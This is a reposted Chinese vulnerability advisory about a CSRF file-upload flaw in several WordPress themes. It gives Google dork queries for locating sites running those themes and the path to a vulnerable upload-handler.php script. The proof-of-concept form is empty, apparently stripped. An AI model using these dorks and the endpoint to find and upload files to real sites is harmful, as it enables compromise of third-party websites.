WordPress的橙色主题跨站请求伪造文件上传漏洞

没穿底裤
没穿底裤
没穿底裤
714
文章
0
评论
2019年12月31日22:06:20评论426 views字数 518阅读1分43秒阅读模式
摘要

发布日期:2013-11.3
发布作者:JJE Incovers漏洞类型:文件上传漏洞描述:利用方法
[php]
inurl:"/wp-content/themes/agritourismo-theme/"
inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"
[/php]
跨站请求伪造文件上传漏洞利用及POC

发布日期:2013-11.3
发布作者:JJE Incovers

漏洞类型:文件上传

漏洞描述:

利用方法
[php]
inurl:"/wp-content/themes/agritourismo-theme/"
inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"
[/php]
跨站请求伪造文件上传漏洞利用及POC

http://0day5.com/wp-content/themes/rockstar-theme/functions/upload-handler.php

Script :
[php]

Your File:

[/php]

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2019年12月31日22:06:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   WordPress的橙色主题跨站请求伪造文件上传漏洞https://cn-sec.com/archives/75294.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息